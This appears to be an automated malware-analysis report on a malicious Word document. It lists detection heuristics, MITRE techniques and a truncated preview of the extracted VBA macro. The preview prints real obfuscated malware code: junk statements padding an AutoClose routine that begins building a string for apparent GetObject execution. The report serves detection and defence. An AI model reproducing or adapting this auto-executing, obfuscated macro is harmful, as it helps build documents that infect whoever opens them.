MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The AutoClose macro is triggered upon closing the document, and it utilizes GetObject to execute code. The presence of the 'Doc.Malware.Generic-6667830-0' ClamAV signature strongly indicates malicious intent, likely to download and execute a secondary payload.
Heuristics 7
-
ClamAV: Doc.Malware.Generic-6667830-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6667830-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 65861 bytes |
SHA-256: cee1aa8a3399d83c429090c7a9e2274e9c72c0edcdaf262e174263aaa3fd0274 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub HuzItEWEDIKiDiMeNyF()
Debug.Print "IzUaUCONuLuJahihETIGaca"
Dim NiocyPewAcAvuOCiWafOGe
NiocyPewAcAvuOCiWafOGe = Log(9)
Debug.Print "zItIaatoNEHIraKEluV"
lYMYwAauxEIhojufoHIPuU = 52681
NiocyPewAcAvuOCiWafOGe = NiocyPewAcAvuOCiWafOGe + Log(13)
Debug.Print "kAnAloaOKevExOC"
NycejEGeQeGiLOXEsyDUXYL = Val("96655.2") & "LYcOCUROSEbedYheaiE"
Dim syqyneJynUPa
TEamaQSaQgosIge = InStr("DuVevUfiMEpEEHYlOTaloKU", "DuVevUfiMEpEEHYlOTaloKUDuVevUfiMEpEEHYlOTaloKU")
gujoPakEQBo = 37166
syqyneJynUPa = Rnd(134)
Dim vonYSYZANyvYz
For vonYSYZANyvYz = 9 To 10
Dim iAJVYpiaPu
iAJVYpiaPu = Fix(98856)
Next
KykuMEVomUsU = InStr("iUiEcoCyMELUQab", "iUiEcoCyMELUQabiUiEcoCyMELUQab")
If syqyneJynUPa > 40734 Then
syqyneJynUPa = Exp(4)
Debug.Print "kuFyrUJoDamYXIV"
End If
End Sub
Sub AutoClose()
Debug.Print "iylYjANUkIkeNEziGeciri"
Dim qujEJoSuNytiTOXuRiryy
For qujEJoSuNytiTOXuRiryy = 10 To 13
Dim GEvuwOPiZUSu
GEvuwOPiZUSu = Fix(71975)
Next
On Error Resume Next
cUlUmovUmYJOPYFuNIia = Val("4945.10") & "rABaHAFImuwe"
CYaOFoPYwoP = Val("25820.6") & "vUVAWAVEQubYjaSAKgyhABa"
Debug.Print "iojODuGTORUnr"
Dim XUXewuTOPEtuBa
XUXewuTOPEtuBa = Log(6)
XUXewuTOPEtuBa = XUXewuTOPEtuBa + Log(11)
VOdEPaijULar = 17799
Dim cifadvYBeJOMi
cifadvYBeJOMi = Log(5)
cifadvYBeJOMi = cifadvYBeJOMi + Log(10)
Dim JEnUaapaaEWIGYKEk
bYToDIcdYwexAzO = 77873
Dim FeGinimEiQeHUpuL
FeGinimEiQeHUpuL = Rnd(134)
If FeGinimEiQeHUpuL > 70110 Then
FeGinimEiQeHUpuL = Exp(4)
End If
JEnUaapaaEWIGYKEk = Log(2)
Dim gixygUkKfO
gixygUkKfO = Log(1)
gixygUkKfO = gixygUkKfO + Log(11)
rAREfaDInuzIaaKyB = 17740
JEnUaapaaEWIGYKEk = JEnUaapaaEWIGYKEk + Log(13)
Debug.Print "KUDeBAFOsINeSExa"
Dim KeCabiqAokNOcyqA
For KeCabiqAokNOcyqA = 5 To 11
Dim LEGutYainIWNuD
LEGutYainIWNuD = Fix(14679)
Next
FaCakutiVIrUevOPZi = Val("10360.5") & "ZEaykiMKYsAk"
Debug.Print "NIdESaBYGpOCyZoQoqivaZ"
Debug.Print "wYJYsARYvYbIjOaUNagUbE"
Debug.Print "FeJALeTEDEHIGug"
dubYFAAkoSYVzeaiWAnono = ""
Dim pAxozOgyXEVotoXyS
For pAxozOgyXEVotoXyS = 7 To 12
Dim dukLYtoZYpon
dukLYtoZYpon = Fix(15085)
Next
kobuKOiOXIVYxipAsUHe = InStr("fIhdFeSIjYG", "fIhdFeSIjYGfIhdFeSIjYG")
NiowapafAR = 78198
Dim TuXYhUcYvYW
TuXYhUcYvYW = Rnd(119)
Dim aUaoAfAigUbYbiZ
aUaoAfAigUbYbiZ = Log(8)
aUaoAfAigUbYbiZ = aUaoAfAigUbYbiZ + Log(11)
Dim GiquiIZEXyLOzyqekeTASu
GiquiIZEXyLOzyqekeTASu = Rnd(106)
If GiquiIZEXyLOzyqekeTASu > 99583 Then
GiquiIZEXyLOzyqekeTASu = Exp(6)
End If
If TuXYhUcYvYW > 14925 Then
GiMEhImYTyMI = Val("69253.3") & "XarygeJUWumiNuOflYtido"
TuXYhUcYvYW = Exp(9)
End If
Debug.Print "heraZYsIZafip"
Dim DUpIGePtAVW
sYaIayXYGmQUkOcyCOcyvu = InStr("MUHYpwINOcYKovOWOwupaZ", "MUHYpwINOcYKovOWOwupaZMUHYpwINOcYKovOWOwupaZ")
Dim NAyiyToiyggYNUPIwl
NAyiyToiyggYNUPIwl = Log(8)
NAyiyToiyggYNUPIwl = NAyiyToiyggYNUPIwl + Log(11)
DUpIGePtAVW = Rnd(134)
If DUpIGePtAVW > 33104 Then
VahIphOCIGf = Val("37176.1") & "mYBAtOXyjUZa"
DUpIGePtAVW = Exp(4)
HaEZUPEzUf = InStr("myChUboWArOduZIByE", "myChUboWArOduZIByEmyChUboWArOduZIByE")
End If
PYaiMaCeLyp = InStr("tEWohyWygaNRLXazuTUHO", "tEWohyWygaNRLXazuTUHOtEWohyWygaNRLXazuTUHO")
dubYFAAkoSYVzeaiWAnono = dubYFAAkoSYVzeaiWAnono + IIf((322 + 644) = 966, "sc", "dTT")
Dim HeFelabAsuBejEdRiqUFa
HeFelabAsuBejEdRiqUFa = Rnd(128)
If HeFelabAsuBejEdRiqUFa > 88693 Then
HeFelabAsuBejEdRiqUFa = Exp(8)
End If
Dim HyhOzuMASuGuVuNuWAwew
Dim GnUmOdOtAMIcYgIJIaox
GnUmOdOtAMIcYgIJIaox = Log(5)
GnUmOdOtAMIcYgIJIaox = GnUmOdOtAMIcYgIJIaox + Log(12)
HyhOzuMASuGuVuNuWAwew = Log(8)
HyhOzuMASuGuVuNuWAwew = HyhOzuMASuGuVuNuWAwew + Log(13)
Dim aAdelaXaKEa
aAdelaXaKEa = Rnd(125)
If aAdelaXaKEa > 24854 Then
aAdelaXaKEa = Exp(5)
End If
Dim FoWcaMEdAJi
GeBIqIRIH
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.